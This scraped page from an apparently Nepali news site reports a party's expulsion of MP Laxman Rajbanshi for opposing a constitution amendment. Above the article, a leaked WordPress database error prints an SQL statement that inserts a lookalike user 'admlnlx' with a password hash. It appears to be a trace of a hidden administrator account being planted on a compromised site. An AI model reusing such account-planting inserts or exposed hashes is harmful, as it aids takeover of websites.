WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhoG75ODUfwY3b1Ag4tyk0EZusy3A00', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 21:38:46', '', 'admlnlx', 'admlnlx')
काठमाण्डु, माघ ६ –
नेपाः राष्ट्रिय पार्टीले सांसद लक्ष्मण रजवंशीलाई कारबाही गरेको छ ।पार्टी नीतिविपरीतका गतिविधिमा लागेकाले राजवंशीलाई कारबाही गरिएको सो पार्टीले जनाएको छ ।
राजवंशीलाई साधारण सदस्यसमेत नरहने गरी निष्काशन गरिएको सो पार्टीका महासचिव विजयप्रकाश सैंजुले बताए । सैंजुले सरकारल संसदमा पेस गरेको संविधान संशोधन प्रस्तावविरुद्ध बोलेको र पहिचानविरोधी शक्ति एमालेलाई सघाएकाले राजवंशीलाई कारबाही गरिएको बताए ।
‘उहाँले पार्टीको नीतिविपरीत पहिचानविरोधीसँग घाँटी जोड्नुभयो’, सैंजुले भने, ‘पहिचानविरोधी र परिवर्तनविरोधी केपी ओलीको प्रवक्ताजस्तो भएर पहिचान पक्षधरको खिल्ली उडाउँदै हिंडेकाले साधारण सदस्यसमेत नरहने गरी निस्काशन गरेका छौं ।’
राजवंशी नेपाः पार्टीका समानुपातिक सांसद हुन् । सैंजुले राजवंशीले पटकपटकको मौखिक र निर्देशनको समेत अवज्ञा गर्दै प्रतिक्रियावादी आन्दोलनमा सहभागी भएको र पहिचानविरोधीको गोटी बनेको आरोप लगाए ।